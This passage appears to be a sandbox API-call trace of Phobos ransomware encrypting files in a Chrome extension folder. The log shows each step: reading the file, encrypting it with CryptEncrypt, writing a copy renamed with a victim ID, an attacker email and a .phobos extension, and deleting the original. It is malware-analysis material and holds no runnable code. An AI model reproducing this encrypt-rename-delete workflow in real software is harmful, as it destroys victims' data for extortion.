(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json")) returned 1 [0153.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.288] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=219) returned 1 [0153.288] CloseHandle (hObject=0x138) returned 1 [0153.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json")) returned 0x2020 [0153.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.288] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.288] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.289] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.289] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdb, lpOverlapped=0x0) returned 1 [0153.290] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.290] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.291] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.291] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.291] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.291] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.291] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.292] CloseHandle (hObject=0x138) returned 1 [0153.292] CloseHandle (hObject=0x130) returned 1 [0153.292] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json")) returned 1 [0153.293] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.294] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=222) returned 1 [0153.294] CloseHandle (hObject=0x130) returned 1 [0153.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json")) returned 0x2020 [0153.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.294] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.294] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.295] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.295] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xde, lpOverlapped=0x0) returned 1 [0153.296] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.296] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.297] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.297] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.297] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.297] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.297] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.297] CloseHandle (hObject=0x130) returned 1 [0153.297] CloseHandle (hObject=0x138) returned 1 [0153.298] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json")) returned 1 [0153.298] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.299] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=236) returned 1 [0153.299] CloseHandle (hObject=0x138) returned 1 [0153.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json")) returned 0x2020 [0153.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.299] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.299] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.300] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.300] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.300] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xec, lpOverlapped=0x0) returned 1 [0153.342] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0153.342] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0153.343] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.343] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.343] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.343] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.343] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.344] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.344] CloseHandle (hObject=0x138) returned 1 [0153.344] CloseHandle (hObject=0x130) returned 1 [0153.344] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json")) returned 1 [0153.345] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.346] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=212) returned 1 [0153.346] CloseHandle (hObject=0x130) returned 1 [0153.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0153.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.346] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.346] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.347] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.347] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd4, lpOverlapped=0x0) returned 1 [0153.348] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0153.348] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0153.349] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.349] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.349] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.349] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.349] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.349] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.349] CloseHandle (hObject=0x130) returned 1 [0153.349] CloseHandle (hObject=0x138) returned 1 [0153.350] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json")) returned 1 [0153.351] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.354] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=352) returned 1 [0153.354] CloseHandle (hObject=0x138) returned 1 [0153.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json")) returned 0x2020 [0153.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 